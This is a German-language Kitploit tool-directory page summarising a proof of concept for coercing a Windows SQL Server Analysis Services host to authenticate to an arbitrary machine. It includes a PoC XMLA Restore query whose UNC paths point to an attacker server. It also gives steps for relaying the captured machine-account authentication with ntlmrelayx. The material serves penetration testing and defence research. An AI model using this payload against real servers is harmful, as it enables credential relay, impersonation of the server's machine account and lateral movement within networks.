Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MSSQL-Analysis-Coerce — Eine Technik, um einen Windows-SQL-Server dazu zu bringen, sich auf einer beliebigen Maschine zu authentifizieren. | Kitploit
Tools/GitHubGitHub/p0dalirius/mssql-analysis-coerce
ExploitationLaterale BewegungPost-ExploitationPenetrationstestsRed TeamingAdversarial-Angriff
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

Eine Technik, um einen Windows-SQL-Server dazu zu bringen, sich auf einer beliebigen Maschine zu authentifizieren.

Repository anzeigen
13313vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MSSQL Analysis Services - Erzwungene Authentifizierung

Eine Technik, um einen Windows-SQL-Server zu zwingen, sich an einer beliebigen Maschine zu authentifizieren.

Dieser Proof of Concept wurde mitverfasst von:

  • Podalirius: Abonnenten des YouTube-Kanals
  • Worty:

Proof of Concept

Um die Authentifizierung als lokales Maschinenkonto auszulösen, müssen wir uns mit Benutzeranmeldedaten mit dem entfernten SQL-Server verbinden:

Anschließend wählen wir "Restore" aus, um die Datenbank aus einer bestimmten Datei wiederherzustellen.

Um die XMLA-Datei zu generieren, tragen Sie den Pfad zu einer beliebigen Datei in das Formular "Backup File" ein und klicken Sie auf OK.

Ändern Sie dann den Pfad zu einer beliebigen Datei und ersetzen Sie ihn durch einen UNC-Pfad zu Ihrem Angreifer-Server (z. B. \\192.168.128\SYSVOL\db.abf).

Proof-of-Concept-XMLA-Abfrage (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

Und wir erhalten eine Authentifizierung vom lokalen Maschinenkonto des SQL-Servers:

Relaying für den Sieg

Sobald wir die Authentifizierung erhalten haben, können wir sie mit ntlmrelayx weiterleiten, um viele Aktionen im Namen des Computers SQL01$ auszuführen.

Das ist cool, aber es ist kompliziert, diese erzwungene Authentifizierung von einer Linux-Angriffsmaschine aus auszulösen, da wir keinen Zugriff auf das SQL Server Management Studio (SSMS) haben.

Referenzen

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
Tool herunterladen